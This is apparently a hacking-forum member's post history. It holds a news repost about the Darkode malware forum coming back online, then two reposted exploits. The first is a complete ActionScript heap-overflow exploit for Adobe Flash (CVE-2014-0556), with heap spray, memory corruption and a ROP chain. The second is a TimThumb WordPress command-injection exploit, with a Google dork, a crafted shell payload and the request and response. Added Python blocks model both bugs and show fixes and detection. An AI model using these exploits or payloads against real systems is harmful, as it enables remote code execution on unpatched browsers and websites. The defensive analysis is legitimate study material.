sniffer

Members
  • Posts: 8
Posts posted by sniffer

  1. Illegal malware marketplace and hacker forum Darkode is back online, weeks after a US-European sting operation claimed to have arrested those behind it.

    At the time of the takedown, announced 15 July, Europol estimated that between 250 and 300 members were using "the most prolific English-speaking cybercriminal forum to date… to trade and barter their hacking expertise, malware and botnets, and to find partners for their next spam runs or malware attacks". 28 people were arrested at the finale of the 18-month operation, including a 26-year-old from Coventry.

    But already a holding site, darkcode.cc, is live and advertising its new and improved services, showing you can't keep a dedicated hacker down. A post on the homepage not only reveals that the ringleaders are still operational and not behind bars, but offers up instructions to the marketplace to ensure customers don't get itchy feet.

    The first of two posts says: "Most of the staff is intact, along with senior members. It appears the raids focused on newly added individuals or people that have been retired from the scene for years."

    It goes on to confirm the forum will be "back in onion land" -- referring to secure, anonymous router Tor -- in an invite-only format. A "generate onion" button sits on the page, but is currently not operational. Knowing the eyes of the law are squarely on it, the forum claims it will only accept known members it can confirm - authentication will be made using the Blockchain API. Like Silk Road 2.0 before it, all this is designed to attract users back and assure them their details will be secure after the raid, with the post continuing: "We will not store any form of user information except a hash of the BTC Guid, a BTC Wallet, and an alias if the user chooses to create one." It warns members to avoid anyone publicly claiming to be a member, and anyone who joined Darkode in the last six to eight months (they'll likely be an informant).

    "We believe full disclosure on how the new forum will function is necessary to allow members to have confidence in its security. Our mission is to cast out any doubts in the setup as well as allow the world to critique the new system."

    As spotted by the Register, 21-year-old UK programmer and malware analyst MalwareTech seems to have the inside track on the site operators, and has backed up suggestions that the main admin at Darkode was not arrested in the July raid made by the FBI and European Cybercrime Centre.

    "Originally the main admin known as 'Sp3cial1st' had posted a statement on pastebin declaring that he wanted to wait and see who all of the 70 users arrested were before bringing the forums back online," writes MalwareTech. Sp3cial1st launched darkcode.cc as a holding page a few hours after that statement, though. The new format, with all members having their own onion address, "would allow the darkode admins greater control over who gets access, preventing people from accessing a hacked account without the owner's onion url," writes MalwareTech. "It would also allow them to better monitor who views what by creating an individual log file for each onion, meaning they could quickly weed out leakers."

    "Even more interesting it states that bitcoin wallets would be tied to accounts and used for users to authenticate on the forums, this would mean that hackers could not use a hacked account to scam with unless they know the user's private key."

    Source : Hacker forum Darkode is back and more secure than ever (Wired UK)

  2. CVE-2014-0556 : Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS

    Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow (Packet Storm)


    /*
    <html>
    <head>
    <title>CVE-2014-0556</title>
    </head>
    <body>
    <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
    <button onclick="swf.exploit()">STOP</button>
    </body>
    </html>
    */
    /*
    (1728.eb0): Break instruction exception - code 80000003 (first chance)
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d63048 cc int 3
    1:020> dd esp l4
    08d63048 cccccccc cccccccc cccccccc cccccccc
    1:020> t
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d63049 cc int 3
    1:020> t
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d6304a cc int 3
    1:020> t
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d6304b cc int 3
    1:020> t
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d6304c cc int 3
    */
    package
    {
        import flash.events.*
        import flash.media.*
        import flash.display.*
        import flash.geom.*
        import flash.utils.*
        import flash.text.*
        import flash.external.ExternalInterface

        public class Main extends Sprite {
            private var i0:uint
            private var i1:uint
            private var i2:uint
            private var i3:uint
            private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
            private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
            private var ob:Vector.<Object> = new Vector.<Object>(6400)
            // 0x100 x 4 pixels at 32bpp, all 0xffffffff: 0x1000 bytes to copy
            private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
            private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
            private var snd:Sound
            private var vector:uint   // address of ob[i0]'s element storage; base for read()/write()
            private var vtable:uint
            private var flash:uint    // Flash32_14_0_0_145.ocx base

            public function Main():void {

                // Spray 3200 ByteArrays of 0x2000 bytes, each with position set just below 2^32
                for (i0 = 0; i0 < 3200; i0++) {
                    ba[i0] = new ByteArray()
                    ba[i0].length = 0x2000
                    ba[i0].position = 0xfffff000
                }

                // Free every even ByteArray and refill each hole with two Vector.<uint>(1008)
                for (i0 = 0; i0 < 3200; i0++) {
                    if (i0 % 2 == 0) ba[i0] = null
                    ob[i0 * 2] = new Vector.<uint>(1008)
                    ob[i0 * 2 + 1] = new Vector.<uint>(1008)
                }

                // Trigger: copy 0x1000 bytes of pixel data into ba[1601] at position 0xfffff000
                bitmap.copyPixelsToByteArray(rect, ba[1601])

                // The vector whose length header was clobbered no longer reports 1008
                for (i0 = 0;; i0++)
                    if (ob[i0].length != 1008) break

                // Use the corrupted vector to set a second vector's length to 0xffffffff
                ob[i0][1024 * 3 - 2] = 0xffffffff

                for (i1 = 0;; i1++) {
                    if (i0 == i1) continue
                    if (ob[i1].length != 1008) break
                }

                // Wrapping (effectively negative) indices into ob[i1] reach memory before it
                ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
                ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
                ob[i0].fixed = true

                // Scan for a structure holding a pointer to ob[i0]'s storage; that pointer becomes 'vector'
                for (i2 = 1000;; i2++) {
                    if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
                        vector = ob[i1][0xFFFFFFFF - i2 + 11]
                        break
                    } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
                        vector = ob[i1][i2 + 11]
                        break
                    }
                }

                snd = new Sound()

                // Replace the remaining vectors with Vector.<Object>(1014), each starting with two refs to snd
                for (i2 = 0; i2 < 6400; i2++) {
                    if (i2 == i0 || i2 == i1) continue
                    ob[i2] = null
                    ob[i2] = new Vector.<Object>(1014)
                    ob[i2][0] = snd
                    ob[i2][1] = snd
                }

                // Find one of those vectors through ob[i0]: length 1014 followed by two identical pointers
                for (i2 = 0;; i2++) {
                    if (ob[i0][i2 + 0] == 1014 &&
                        ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
                        ob[i0][i2 + 3] == 1
                    ) {
                        // The stored reference is tagged, hence -1: read snd's vtable pointer,
                        // derive the module base from it, then point the vtable at ob[i0]'s storage
                        vtable = read(ob[i0][i2 + 1] - 1)
                        flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx
                        write(ob[i0][i2 + 1] - 1, vector + 0xf54)
                        for (i3 = 0; i3 < 1008; i3++) {
                            ob[i0][i3] = 0x41414100 | i3
                        }
                        // ROP chain: registers are staged so PUSHAD lands in VirtualProtect(),
                        // then 'jmp esp' runs the int3 "shellcode" seen in the debugger trace above
                        ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN
                        ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes
                        ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN
                        ob[i0][3] = 0x00000201 // 0x00000201
                        ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN
                        ob[i0][5] = 0x00000040 // 0x00000040
                        ob[i0][6] = flash + 0x00691119 // POP ECX # RETN
                        ob[i0][7] = vector + 2000 // Writable location
                        ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN
                        ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP)
                        ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN
                        ob[i0][11] = flash + 0x0000d83f // JMP [EAX]
                        ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN
                        ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect()
                        ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN
                        ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp'
                        ob[i0][16] = 0xcccccccc // shellcode
                        ob[i0][17] = 0xcccccccc // shellcode
                        ob[i0][18] = 0xcccccccc // shellcode
                        ob[i0][19] = 0xcccccccc // shellcode
                        // Stack pivot entered via the hijacked virtual call: compute the chain's
                        // address from ESP and swap it into ESP
                        ob[i0][979] = flash + 0x0029913A // POP EAX # RETN
                        ob[i0][980] = 0x00000f58
                        ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN
                        ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN
                        ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN
                        ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN
                        break
                    }
                }

                // Put bounded lengths back on the two corrupted vectors
                ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
                ob[i0][1024 * 3 - 2] = 0
                str += flash.toString(16)
                var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf)

                if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
            }

            // Absolute write through ob[i0]: element k lives at vector + 8 + 4*k
            private function write(addr:uint, data:uint):void {
                ob[i0][(addr - vector) / 4 - 2] = data
            }

            // Absolute read, same addressing as write()
            private function read(addr:uint):uint {
                return ob[i0][(addr - vector) / 4 - 2]
            }

            private function zeroPad(number:String, width:int):String {
                if (number.length < width)
                    return "0" + zeroPad(number, width-1)
                return number
            }

            // Called from the page's STOP button: the virtual call goes through the replaced vtable
            public function exploit():void {
                snd.toString()
            }
        }
    }

    • Upvote 1
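An added example, not hdarwin's code and not Adobe's source. The PoC above fixes three numbers: ByteArray.length = 0x2000, position = 0xfffff000, and a 0x100 x 4 ARGB bitmap, i.e. 0x1000 bytes to copy. The CVE summary only says "heap-based buffer overflow"; the check modelled below (a `position + size <= length` test computed in 32 bits) is an assumption about the bug class suggested by those parameters, not the real code path in Flash, which is not on the page. The block shows why that arithmetic lets the copy through, where the bytes land relative to the buffer, and what an overflow-proof check looks like.

```python
"""Model of a 32-bit bounds-check bypass matching the CVE-2014-0556 PoC parameters.

Assumed reconstruction (see lead-in): Flash's actual check is not on the page.
"""

MASK32 = 0xFFFFFFFF


def pixel_bytes(width: int, height: int) -> int:
    """Bytes copyPixelsToByteArray emits for a 32bpp (ARGB) bitmap."""
    return width * height * 4


def unsafe_check(position: int, size: int, length: int) -> bool:
    """Assumed vulnerable pattern: the end offset is computed in 32 bits, so a
    position near 2**32 makes position + size wrap to a small value and the
    write is allowed. Returns True when the copy would proceed."""
    end = (position + size) & MASK32
    return end <= length


def safe_check(position: int, size: int, length: int) -> bool:
    """Overflow-proof form: never form a sum that can wrap; compare the size
    against the space remaining after position instead."""
    if position > length or size > length:
        return False
    return size <= length - position


def effective_offset(position: int, size: int) -> tuple:
    """Start and end offsets (mod 2**32) the bytes would be written at once the
    unsafe check passes. For the PoC numbers the end wraps to 0."""
    return position & MASK32, (position + size) & MASK32


def wrapped_start_as_signed(position: int) -> int:
    """Same start offset read as a signed 32-bit displacement: adding
    0xfffff000 to a 32-bit base pointer lands 0x1000 bytes *before* it, which
    is the neighbouring heap object the PoC arranges to be a Vector.<uint>."""
    start = position & MASK32
    return start - (1 << 32) if start & 0x80000000 else start


# Parameters taken from the PoC on this page.
POC_LENGTH = 0x2000
POC_POSITION = 0xFFFFF000
POC_SIZE = pixel_bytes(0x100, 4)  # 0x1000 bytes of 0xffffffff pixels

if __name__ == "__main__":
    print("unsafe check allows PoC write :", unsafe_check(POC_POSITION, POC_SIZE, POC_LENGTH))
    print("safe check allows PoC write   :", safe_check(POC_POSITION, POC_SIZE, POC_LENGTH))
    print("write spans buffer+%#x .. buffer+%#x" % effective_offset(POC_POSITION, POC_SIZE))
    print("start as signed displacement  : %#x" % wrapped_start_as_signed(POC_POSITION))
```

The displacement of -0x1000 is the reason the PoC frees every even ByteArray and refills the holes with Vector.<uint>(1008) objects: whatever sits immediately below ba[1601]'s buffer receives 0x1000 bytes of 0xffffffff, and a vector header there ends up with length 0xffffffff, which the scan loop then detects.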
  3. exploit : http://www.exploit-db.com/exploits/33851/

    news : Zero-Day TimThumb WebShot Vulnerability leaves Thousands of Wordpress Blogs at Risk - The Hacker News

    Dork : inurl:"/themify/" intitle:"index of /"


    ######################################################################
    #  _     ___  _   _  ____  ____    _  _____ 
    # | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
    # | |  | | | |  \| | |  _| |     / _ \ | |  
    # | |__| |_| | |\  | |_| | |___ / ___ \| |  
    # |_____\___/|_| \_|\____|\____/_/   \_\_|  
    #
    # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
    # Affected website : a lot of WordPress themes, plugins, 3rd-party components
    # Exploit Author : @u0x (Pichaya Morimoto)
    # Release dates : June 24, 2014
    #
    # Special Thanks to 2600 Thailand group
    # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
    # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
    #
    ########################################################################

    [+] Description
    ============================================================
    TimThumb is a small php script for cropping, zooming and resizing web
    images (jpg, png, gif). Perfect for use on blogs and other applications.
    Developed for use in the WordPress theme Mimbo Pro, and since used in many
    other WordPress themes.

    http://www.binarymoon.co.uk/projects/timthumb/
    https://code.google.com/p/timthumb/

    The original project WordThumb 1.07 is also vulnerable (
    https://code.google.com/p/wordthumb/).
    They both shared exactly the same WebShot code! And there are several
    projects that shipped with "timthumb.php", such as,
    Wordpress Gallery Plugin
    https://wordpress.org/plugins/wordpress-gallery-plugin/
    IGIT Posts Slider Widget
    http://wordpress.org/plugins/igit-posts-slider-widget/

    All themes from http://themify.me/ contains vulnerable "wordthumb" in
    "<theme-name>/themify/img.php".

    [+] Exploit
    ============================================================
    http://
    <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://
    <wp-website>$(<os-cmds>)

    ** Note that OS commands payload MUST be within following character sets:
    [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]

    ** Spaces, Pipe, GT sign are not allowed.
    ** This WebShot feature is DISABLED by default.
    ** CutyCapt and XVFB must be installed in constants.

    [+] Proof-of-Concept
    ============================================================
    There are a couple of techniques that can be used to bypass the limited charset, but
    I will use the shell variable $IFS instead of a space in this scenario.

    PoC Environment:
    Ubuntu 14.04 LTS
    PHP 5.5.9
    Wordpress 3.9.1
    Themify Parallax Theme 1.5.2
    WordThumb 1.07

    Crafted Exploit:
    http://longcatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat)

    GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
    Host: longcatlab.local
    Proxy-Connection: keep-alive
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Cookie: woocommerce_recently_viewed=9%7C12%7C16; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685

    HTTP/1.1 400 Bad Request
    Date: Tue, 24 Jun 2014 07:20:48 GMT
    Server: Apache
    X-Powered-By: PHP/5.5.9-1ubuntu4
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Content-Length: 3059
    Connection: close
    Content-Type: text/html


    <a href='http://www.php.net/function.getimagesize'
    target='_new'>getimagesize</a>
    ( )</td><td
    title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'
    bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr>
    </table></font>
    <h1>A WordThumb error has occured</h1>The following error(s) occured:<br
    /><ul><li>The image being resized is not a valid gif, jpg or
    png.</li></ul><br /><br />Query String : webshot=1&src=
    http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :
    1.07</pre>

    Even though it responds with an error message, the injected OS command has already
    been executed.

    $ ls /tmp/longcat -lha
    -rw-r--r-- 1 www-data www-data 0 Jun 24 14:20 /tmp/longcat


    [+] Vulnerability Analysis
    ============================================================
    https://timthumb.googlecode.com/svn/trunk/timthumb.php

    Filename: timthumb.php

    if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
    if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT',
    '/usr/local/bin/CutyCapt');
    if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');
    ...
    timthumb::start(); <-- start script
    ...
    public static function start(){
    $tim = new timthumb(); <-- create timthumb object, call __construct()
    ...
    $tim->run();
    ...
    public function __construct(){
    ...
    $this->src = $this->param('src'); <-- set "src" variable to HTTP GET "src" parameter

    if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
    ...
    $this->isURL = true; <-- http/s prefix results in isURL = true
    }
    ...

    protected function param($property, $default = ''){
    if (isset ($_GET[$property])) {
    return $_GET[$property];
    ...

    public function run(){
    if($this->isURL){
    ...
    if($this->param('webshot')){ <-- HTTP GET "webshot" must be submitted
    if(WEBSHOT_ENABLED){ <-- this pre-defined constant must be true
    ...
    $this->serveWebshot(); <-- call webshot feature
    } else {
    ...

    protected function serveWebshot(){
    ...
    if(! is_file(WEBSHOT_CUTYCAPT)){ <-- check that CutyCapt exists
    return $this->error("CutyCapt is not installed. $instr");
    }
    if(! is_file(WEBSHOT_XVFB)){ <-- check that Xvfb exists
    return $this->Error("Xvfb is not installed. $instr");
    }
    ...
    $url = $this->src;
    if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ <-- check valid URL #LoL
    return $this->error("Invalid URL supplied.");
    }
    $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url); <-- check valid URL as specified in RFC 3986 (http://www.ietf.org/rfc/rfc3986.txt)
    ...
    if(WEBSHOT_XVFB_RUNNING){
    putenv('DISPLAY=:100.0');
    $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; <-- OS shell command injection
    } else {
    $command = "$xv --server-args=\"-screen 0, {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; <-- OS shell command injection
    }
    ...
    $out = `$command`; <-- execute $command as shell command

    "PHP supports one execution operator: backticks (``). Note that these are
    not single-quotes! PHP will attempt to execute the contents of the
    backticks as a shell command." -
    http://www.php.net//manual/en/language.operators.execution.php

    "$url" fails to escape "$()" in "$command", which results in arbitrary
    code execution.

    Jabber : Sniffer@jabber.ru

    Skype : Ali_Sniffer

    • Upvote 1
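An added example, not the advisory author's exploit and not timthumb.php. It re-implements in Python the two steps the advisory quotes from serveWebshot() (the RFC 3986 character whitelist applied to $src, then interpolation of $url into a backtick command) so the bypass can be checked offline, puts a hardened build of the same command beside the vulnerable one, and adds a small detector for the payload shape in access-log query strings. Nothing is executed: a minimal model of POSIX sh quoting decides whether the shell would perform command or parameter substitution. Assumptions: the CutyCapt option values ($timeout, $ua, $tempfile, ...) are constructed placeholders, the sample requests are constructed, and `shlex.quote` stands in for PHP's escapeshellarg (both wrap the value in single quotes).

```python
"""TimThumb/WordThumb WebShot command injection, modelled offline.

Added example; regexes are copied from the advisory's timthumb.php excerpt,
everything else is a stand-in (see lead-in).
"""
import re
import shlex
from urllib.parse import unquote, urlsplit

# Regexes quoted from timthumb.php in the advisory. The prefix check is only
# anchored at the start: everything after the host is unconstrained.
URL_PREFIX_RE = re.compile(r'^https?://[a-zA-Z0-9.\-]+', re.I)
RFC3986_STRIP_RE = re.compile(r"[^A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=]+")
HOST_RE = re.compile(r'^[A-Za-z0-9.-]+$')

# Constructed stand-ins for the PHP variables in the advisory's $command.
CUTY, TIMEOUT, UA, FORMAT, TEMPFILE = (
    '/usr/local/bin/CutyCapt', 20, 'Mozilla', 'png', '/tmp/webshot.png')


def sanitise_like_timthumb(src: str) -> str:
    """The advisory's filter: prefix check, then strip non-RFC3986 characters.
    '$', '(' and ')' are all in the allowed set, so $(...) survives; space,
    '|' and '>' do not, which is the charset restriction the advisory notes."""
    if not URL_PREFIX_RE.match(src):
        raise ValueError("Invalid URL supplied.")
    return RFC3986_STRIP_RE.sub('', src)


def vulnerable_command(src: str) -> str:
    """$command as serveWebshot() builds it: $url sits inside double quotes,
    which the shell still expands."""
    url = sanitise_like_timthumb(src)
    return (f'{CUTY} --max-wait={TIMEOUT} --user-agent="{UA}" --javascript=on '
            f'--js-can-open-windows=off --url="{url}" --out-format={FORMAT} '
            f'--out={TEMPFILE}')


def hardened_command(src: str) -> str:
    """Same command with two changes: the host must be a plain hostname (not
    merely 'start with one'), and every attacker-influenced value is
    single-quoted so the shell passes it through as one literal argument."""
    parts = urlsplit(src)
    if parts.scheme not in ('http', 'https') or not HOST_RE.match(parts.hostname or ''):
        raise ValueError("Invalid URL supplied.")
    return (f'{CUTY} --max-wait={TIMEOUT} --user-agent={shlex.quote(UA)} --javascript=on '
            f'--js-can-open-windows=off --url={shlex.quote(src)} --out-format={FORMAT} '
            f'--out={shlex.quote(TEMPFILE)}')


def shell_would_substitute(command: str) -> bool:
    """Minimal sh quoting model: True if `$(`, `${`, `$NAME` or a backtick
    appears where the shell would expand it, i.e. outside single quotes and
    not backslash-escaped. Double quotes do not protect against any of these."""
    in_single = in_double = False
    i, n = 0, len(command)
    while i < n:
        c = command[i]
        if in_single:
            in_single = c != "'"
        elif c == '\\':
            i += 1                      # skip the escaped character
        elif c == "'" and not in_double:
            in_single = True
        elif c == '"':
            in_double = not in_double
        elif c == '`':
            return True
        elif c == '$' and i + 1 < n and (command[i + 1] in '({_' or command[i + 1].isalnum()):
            return True
        i += 1
    return False


def detect_in_query(query_string: str) -> bool:
    """Access-log detection: flag webshot=... requests whose URL-decoded src
    carries shell substitution syntax."""
    params = dict(p.split('=', 1) for p in query_string.split('&') if '=' in p)
    if 'webshot' not in params:
        return False
    return shell_would_substitute(unquote(params.get('src', '')))


# Payload from the advisory, plus one constructed benign request for contrast.
PAYLOAD = 'http://longcatlab.local/$(touch$IFS/tmp/longcat)'
BENIGN = 'http://longcatlab.local/?p=12'

if __name__ == '__main__':
    print('whitelist keeps payload intact :', sanitise_like_timthumb(PAYLOAD) == PAYLOAD)
    print('vulnerable command expands     :', shell_would_substitute(vulnerable_command(PAYLOAD)))
    print('hardened command expands       :', shell_would_substitute(hardened_command(PAYLOAD)))
    print('benign request flagged         :', detect_in_query('webshot=1&src=' + BENIGN))
    print('payload request flagged        :', detect_in_query('webshot=1&src=' + PAYLOAD))
```

The whitelist is the interesting part: it is a faithful RFC 3986 character set, and RFC 3986 deliberately permits `$`, `(` and `)` in URLs, so a filter that validates "this is a URL" says nothing about whether the value is safe to splice into a shell command line. Quoting the argument (or avoiding the shell entirely by passing an argv array to the subprocess) is the fix; the charset filter only shapes the payload, as the `$IFS` trick shows.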